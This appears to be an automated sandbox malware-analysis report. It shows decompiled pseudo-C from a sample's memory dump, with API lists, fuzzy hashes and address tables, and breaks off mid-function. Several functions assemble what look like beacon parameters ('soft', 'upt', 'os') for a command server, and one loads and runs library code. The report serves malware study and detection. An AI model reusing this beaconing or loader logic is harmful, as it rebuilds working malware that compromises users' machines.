    • Opcode ID: e41906d64f3431557fb8e30504978e95657daa670f278a4ea385e25176c73cca
    • Instruction ID: 7a997c52362b5b2f01a82073e14a60245247ecb0ddc5fb4c56a558bbe523fa90
    • Opcode Fuzzy Hash: e41906d64f3431557fb8e30504978e95657daa670f278a4ea385e25176c73cca
    • Instruction Fuzzy Hash: 1761C430B067019BFFA9CF2CD88066973EAFB87354B29C56BE951CB394E731D841A644
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03097DE0, Relevance: .1, Instructions: 77COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 71%
    			E03097DE0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E03097F4B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E03098005(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E03097EF0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E03097F4B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E03097FE7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























    0x03097de4
    0x03097de5
    0x03097de6
    0x03097de9
    0x03097deb
    0x03097dee
    0x03097def
    0x03097df1
    0x03097df2
    0x03097df3
    0x03097df6
    0x03097e00
    0x03097eb1
    0x03097eb8
    0x03097ec1
    0x03097e06
    0x03097e06
    0x03097e0c
    0x03097e12
    0x03097e15
    0x03097e18
    0x03097e1c
    0x03097e21
    0x03097e26
    0x03097ea6
    0x00000000
    0x03097e28
    0x03097e28
    0x03097e34
    0x03097e36
    0x03097e91
    0x03097e91
    0x03097e97
    0x00000000
    0x03097e38
    0x03097e47
    0x03097e49
    0x03097e4a
    0x03097e4b
    0x03097e4e
    0x03097e4e
    0x03097e50
    0x00000000
    0x03097e52
    0x03097e52
    0x03097e9c
    0x03097e54
    0x03097e54
    0x03097e58
    0x03097e60
    0x03097e65
    0x03097e6a
    0x03097e76
    0x03097e7e
    0x03097e85
    0x03097e8b
    0x03097e8f
    0x00000000
    0x03097e8f
    0x03097e52
    0x03097e50
    0x00000000
    0x03097e36
    0x03097eaa
    0x03097eaa
    0x03097eaa
    0x03097e26
    0x03097ec6
    0x03097ecd

    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
    • Instruction ID: 3d1d18b4bfcd03a960479b5f4b9b55aaef1f30d6819409c76bea6a5638af3c0d
    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
    • Instruction Fuzzy Hash: 7221C4339012049FDF14EF68C8809ABFBA5FF88310B0A80A9D9559B245D730F915C7E0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03096EFC, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220memorystringCOMMON
    Download Yara Rule
    C-Code - Quality: 70%
    			E03096EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x309a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x309a018; // 0x658828bf
					asm("bswap eax");
					_t32 =  *0x309a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x309a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x309a00c; // 0xf5f4113d
					asm("bswap eax");
					_t35 =  *0x309a2d4; // 0x3ccd5a8
					_t2 = _t35 + 0x309b613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x309a02c,  *0x309a004, _t110);
					_t38 = E03096A09();
					_t39 =  *0x309a2d4; // 0x3ccd5a8
					_t3 = _t39 + 0x309b653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x309a2d4; // 0x3ccd5a8
						_t7 = _t92 + 0x309b65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E03095040(_t99);
					_t44 =  *0x309a2d4; // 0x3ccd5a8
					_t9 = _t44 + 0x309b302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x309a2d4; // 0x3ccd5a8
					_t11 = _t48 + 0x309b2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x309a32c; // 0x6d695b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x309a2d4; // 0x3ccd5a8
						_t13 = _t88 + 0x309b676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x309a37c; // 0x6d69630
					_a28 = E03092885(0x309a00a, _t105 + 4);
					_t55 =  *0x309a31c; // 0x6d695e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x309a2d4; // 0x3ccd5a8
						_t16 = _t84 + 0x309b8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x309a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x309a2d4; // 0x3ccd5a8
						_t18 = _t81 + 0x309b8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x309a290, _t107, 0x800);
						if(_t98 != _t107) {
							E03092DD0(GetTickCount());
							_t62 =  *0x309a37c; // 0x6d69630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x309a37c; // 0x6d69630
							__imp__(_t66 + 0x40);
							_t68 =  *0x309a37c; // 0x6d69630
							_t115 = E0309624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x30992ac);
								_push(_t115);
								_t108 = E030921C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E03091032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E03091492();
									}
									HeapFree( *0x309a290, 0, _v24);
								}
								HeapFree( *0x309a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x309a290, _t107, _t98);
						}
						HeapFree( *0x309a290, _t107, _a20);
					}
					HeapFree( *0x309a290, _t107, _t117);
				}
				return _v16;
			}





















































    0x03096efc
    0x03096f10
    0x03096f12
    0x03096f20
    0x03096f24
    0x03096f2c
    0x03096f34
    0x03096f34
    0x03096f36
    0x03096f42
    0x03096f51
    0x03096f56
    0x03096f59
    0x03096f5e
    0x03096f61
    0x03096f66
    0x03096f69
    0x03096f75
    0x03096f82
    0x03096f84
    0x03096f8a
    0x03096f8f
    0x03096f9a
    0x03096f9c
    0x03096f9f
    0x03096fa5
    0x03096fa7
    0x03096fb0
    0x03096fbb
    0x03096fbd
    0x03096fc0
    0x03096fc0
    0x03096fc2
    0x03096fc9
    0x03096fce
    0x03096fdb
    0x03096fdd
    0x03096fe2
    0x03096ff0
    0x03096ff2
    0x03096ff7
    0x03096ffc
    0x03096fff
    0x03097004
    0x0309700f
    0x03097011
    0x03097014
    0x03097014
    0x03097016
    0x03097029
    0x0309702d
    0x03097032
    0x03097036
    0x03097039
    0x0309703e
    0x03097049
    0x0309704b
    0x0309704e
    0x0309704e
    0x03097050
    0x03097057
    0x0309705a
    0x0309705f
    0x03097069
    0x0309706b
    0x03097072
    0x0309708a
    0x0309708e
    0x0309709a
    0x0309709f
    0x030970a8
    0x030970b9
    0x030970bd
    0x030970c6
    0x030970cc
    0x030970d9
    0x030970e6
    0x030970ec
    0x030970f4
    0x030970fa
    0x03097100
    0x03097104
    0x03097108
    0x0309710e
    0x03097112
    0x03097119
    0x03097120
    0x03097124
    0x0309712f
    0x03097136
    0x0309713a
    0x03097143
    0x03097143
    0x03097154
    0x03097154
    0x03097163
    0x03097169
    0x03097169
    0x03097173
    0x03097173
    0x03097184
    0x03097184
    0x03097192
    0x03097192
    0x030971a2

    APIs
    • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 03096F1A
    • GetTickCount.KERNEL32 ref: 03096F2E
    • wsprintfA.USER32 ref: 03096F7D
    • wsprintfA.USER32 ref: 03096F9A
    • wsprintfA.USER32 ref: 03096FBB
    • wsprintfA.USER32 ref: 03096FD9
    • wsprintfA.USER32 ref: 03096FEE
    • wsprintfA.USER32 ref: 0309700F
    • wsprintfA.USER32 ref: 03097049
    • wsprintfA.USER32 ref: 03097069
    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03097084
    • GetTickCount.KERNEL32 ref: 03097094
    • RtlEnterCriticalSection.NTDLL(06D695F0), ref: 030970A8
    • RtlLeaveCriticalSection.NTDLL(06D695F0), ref: 030970C6
      • Part of subcall function 0309624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,030970D9,00000000,06D69630), ref: 03096278
      • Part of subcall function 0309624D: lstrlen.KERNEL32(00000000,?,00000000,030970D9,00000000,06D69630), ref: 03096280
      • Part of subcall function 0309624D: strcpy.NTDLL ref: 03096297
      • Part of subcall function 0309624D: lstrcat.KERNEL32(00000000,00000000), ref: 030962A2
      • Part of subcall function 0309624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,030970D9,?,00000000,030970D9,00000000,06D69630), ref: 030962BF
    • StrTrimA.SHLWAPI(00000000,030992AC,00000000,06D69630), ref: 030970F4
      • Part of subcall function 030921C1: lstrlen.KERNEL32(06D687FA,00000000,00000000,00000000,03097100,00000000), ref: 030921D1
      • Part of subcall function 030921C1: lstrlen.KERNEL32(?), ref: 030921D9
      • Part of subcall function 030921C1: lstrcpy.KERNEL32(00000000,06D687FA), ref: 030921ED
      • Part of subcall function 030921C1: lstrcat.KERNEL32(00000000,?), ref: 030921F8
    • lstrcpy.KERNEL32(00000000,?), ref: 03097112
    • lstrcat.KERNEL32(00000000,00000000), ref: 03097120
    • lstrcat.KERNEL32(00000000,00000000), ref: 03097124
    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 03097154
    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03097163
    • HeapFree.KERNEL32(00000000,00000000,00000000,06D69630), ref: 03097173
    • HeapFree.KERNEL32(00000000,?), ref: 03097184
    • HeapFree.KERNEL32(00000000,00000000), ref: 03097192
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
    • String ID: Uxt
    • API String ID: 1837416118-1536154274
    • Opcode ID: 95d521f99e54d4ad67c502f2fe5cd3ff47c5438280be75f561d17a2007f34a99
    • Instruction ID: 71d11c427f5c4030a51c36daf35eaeb0c4f18e86af675fc5c728e527f2fb2311
    • Opcode Fuzzy Hash: 95d521f99e54d4ad67c502f2fe5cd3ff47c5438280be75f561d17a2007f34a99
    • Instruction Fuzzy Hash: B1719C72202204AFDB61EB68EC88E9777ECFBCC710B060517F959C7214E63EA815DB64
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030946D1, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 262memorystringCOMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			E030946D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x309a018; // 0x658828bf
				asm("bswap eax");
				_t65 =  *0x309a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x309a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x309a00c; // 0xf5f4113d
				asm("bswap eax");
				_t68 =  *0x309a2d4; // 0x3ccd5a8
				_t3 = _t68 + 0x309b613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x309a02c,  *0x309a004, _t63);
				_t71 = E03096A09();
				_t72 =  *0x309a2d4; // 0x3ccd5a8
				_t4 = _t72 + 0x309b653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x309a2d4; // 0x3ccd5a8
					_t8 = _t139 + 0x309b65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E03095040(_t144);
				_t77 =  *0x309a2d4; // 0x3ccd5a8
				_t10 = _t77 + 0x309b302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x309a2d4; // 0x3ccd5a8
				_t12 = _t81 + 0x309b7aa; // 0x6d68d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x309b2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x309a31c; // 0x6d695e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x309a2d4; // 0x3ccd5a8
					_t18 = _t135 + 0x309b8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x309a32c; // 0x6d695b0
				if(_t86 != 0) {
					_t132 =  *0x309a2d4; // 0x3ccd5a8
					_t20 = _t132 + 0x309b676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x309a37c; // 0x6d69630
				_t88 = E03092885(0x309a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x309a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x309a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x309a290, _t167, _v12);
						goto L28;
					}
					E03092DD0(GetTickCount());
					_t95 =  *0x309a37c; // 0x6d69630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x309a37c; // 0x6d69630
					__imp__(_t99 + 0x40);
					_t101 =  *0x309a37c; // 0x6d69630
					_t163 = E0309624D(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x309a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x30992ac);
					_push(_t163);
					_t107 = E030921C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x309a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E03094AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E03091492();
						L24:
						HeapFree( *0x309a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E030926C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E0309161A(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E030950CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E0309580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E030950CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}


























































    0x030946d1
    0x030946d1
    0x030946d1
    0x030946da
    0x030946df
    0x030946e6
    0x030946e8
    0x030946e8
    0x030946f5
    0x03094700
    0x03094703
    0x0309470e
    0x03094711
    0x03094716
    0x03094719
    0x0309471e
    0x03094721
    0x0309472d
    0x0309473a
    0x0309473c
    0x03094742
    0x03094747
    0x03094752
    0x03094754
    0x03094757
    0x0309475d
    0x0309475f
    0x03094767
    0x03094772
    0x03094774
    0x03094777
    0x03094777
    0x03094779
    0x03094780
    0x03094785
    0x03094792
    0x03094794
    0x03094799
    0x030947a1
    0x030947a4
    0x030947aa
    0x030947b5
    0x030947b7
    0x030947bc
    0x030947c1
    0x030947c4
    0x030947c9
    0x030947d4
    0x030947d6
    0x030947d9
    0x030947d9
    0x030947db
    0x030947e2
    0x030947e5
    0x030947ea
    0x030947f4
    0x030947f6
    0x030947f6
    0x030947f9
    0x03094807
    0x0309480c
    0x03094810
    0x03094813
    0x030949dd
    0x030949e5
    0x030949f2
    0x03094819
    0x03094825
    0x0309482d
    0x03094830
    0x030949cd
    0x030949d7
    0x00000000
    0x030949d7
    0x0309483c
    0x03094841
    0x0309484a
    0x0309485b
    0x0309485f
    0x03094868
    0x0309486e
    0x0309487b
    0x03094882
    0x0309488b
    0x03094891
    0x030949bd
    0x030949c7
    0x00000000
    0x030949c7
    0x0309489d
    0x030948a3
    0x030948a4
    0x030948ab
    0x030948ae
    0x030949af
    0x030949b7
    0x00000000
    0x030949b7
    0x030948b7
    0x030948bd
    0x030948c6
    0x030948cf
    0x030948da
    0x030948e1
    0x030948e4
    0x030949f5
    0x03094997
    0x03094997
    0x0309499c
    0x030949a7
    0x030949ad
    0x00000000
    0x030949ad
    0x030948ee
    0x030948f5
    0x030948f8
    0x030948fd
    0x0309490d
    0x03094910
    0x03094916
    0x0309491c
    0x03094922
    0x03094925
    0x0309492b
    0x0309492e
    0x03094933
    0x03094937
    0x03094937
    0x03094943
    0x0309494f
    0x03094953
    0x03094955
    0x0309495a
    0x0309495c
    0x03094961
    0x03094966
    0x03094973
    0x0309497b
    0x0309497e
    0x0309497e
    0x0309495a
    0x00000000
    0x03094945
    0x03094949
    0x03094980
    0x03094983
    0x0309498c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0309498c
    0x0309494b
    0x00000000
    0x0309494b
    0x03094943

    APIs
    • GetTickCount.KERNEL32 ref: 030946E8
    • wsprintfA.USER32 ref: 03094735
    • wsprintfA.USER32 ref: 03094752
    • wsprintfA.USER32 ref: 03094772
    • wsprintfA.USER32 ref: 03094790
    • wsprintfA.USER32 ref: 030947B3
    • wsprintfA.USER32 ref: 030947D4
    • wsprintfA.USER32 ref: 030947F4
    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03094825
    • GetTickCount.KERNEL32 ref: 03094836
    • RtlEnterCriticalSection.NTDLL(06D695F0), ref: 0309484A
    • RtlLeaveCriticalSection.NTDLL(06D695F0), ref: 03094868
      • Part of subcall function 0309624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,030970D9,00000000,06D69630), ref: 03096278
      • Part of subcall function 0309624D: lstrlen.KERNEL32(00000000,?,00000000,030970D9,00000000,06D69630), ref: 03096280
      • Part of subcall function 0309624D: strcpy.NTDLL ref: 03096297
      • Part of subcall function 0309624D: lstrcat.KERNEL32(00000000,00000000), ref: 030962A2
      • Part of subcall function 0309624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,030970D9,?,00000000,030970D9,00000000,06D69630), ref: 030962BF
    • StrTrimA.SHLWAPI(00000000,030992AC,?,06D69630), ref: 0309489D
      • Part of subcall function 030921C1: lstrlen.KERNEL32(06D687FA,00000000,00000000,00000000,03097100,00000000), ref: 030921D1
      • Part of subcall function 030921C1: lstrlen.KERNEL32(?), ref: 030921D9
      • Part of subcall function 030921C1: lstrcpy.KERNEL32(00000000,06D687FA), ref: 030921ED
      • Part of subcall function 030921C1: lstrcat.KERNEL32(00000000,?), ref: 030921F8
    • lstrcpy.KERNEL32(00000000,?), ref: 030948BD
    • lstrcat.KERNEL32(00000000,?), ref: 030948CF
    • lstrcat.KERNEL32(00000000,00000000), ref: 030948D5
      • Part of subcall function 03094AA6: lstrlen.KERNEL32(?,00000000,06D69C98,770CC740,030913D0,06D69E9D,030955DE,030955DE,?,030955DE,?,63699BC3,E8FA7DD7,00000000), ref: 03094AAD
      • Part of subcall function 03094AA6: mbstowcs.NTDLL ref: 03094AD6
      • Part of subcall function 03094AA6: memset.NTDLL ref: 03094AE8
    • wcstombs.NTDLL ref: 03094966
      • Part of subcall function 0309161A: SysAllocString.OLEAUT32(00000000), ref: 0309165B
      • Part of subcall function 030950CA: HeapFree.KERNEL32(00000000,00000000,03094239,00000000,00000001,?,00000000,?,?,?,03096B8D,00000000,?,00000001), ref: 030950D6
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 030949A7
    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 030949B7
    • HeapFree.KERNEL32(00000000,00000000,?,06D69630), ref: 030949C7
    • HeapFree.KERNEL32(00000000,?), ref: 030949D7
    • HeapFree.KERNEL32(00000000,?), ref: 030949E5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
    • String ID: Uxt
    • API String ID: 972889839-1536154274
    • Opcode ID: b702a4fb390395006b8490f3d6b23a09c7e8a6c5bf6ffbfeb077e6eacde3bfb5
    • Instruction ID: 6d73306f6e0aeba0cc06a0d9b9b94cd12ac1124694d2363af801e9cc63956476
    • Opcode Fuzzy Hash: b702a4fb390395006b8490f3d6b23a09c7e8a6c5bf6ffbfeb077e6eacde3bfb5
    • Instruction Fuzzy Hash: B8A15B71602209AFDF11EF69DC88E9A7BEDFF89310F154026F908CB254DB399911DBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030951A8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110librarymemoryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 61%
    			E030951A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E03094F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E030977A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x309a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x309a2d4; // 0x3ccd5a8
					_t18 = _t50 + 0x309b4a3; // 0x73797325
					_t52 = E03096343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x309a2d4; // 0x3ccd5a8
						_t20 = _t53 + 0x309b770; // 0x6d68d18
						_t21 = _t53 + 0x309b0af; // 0x4e52454b
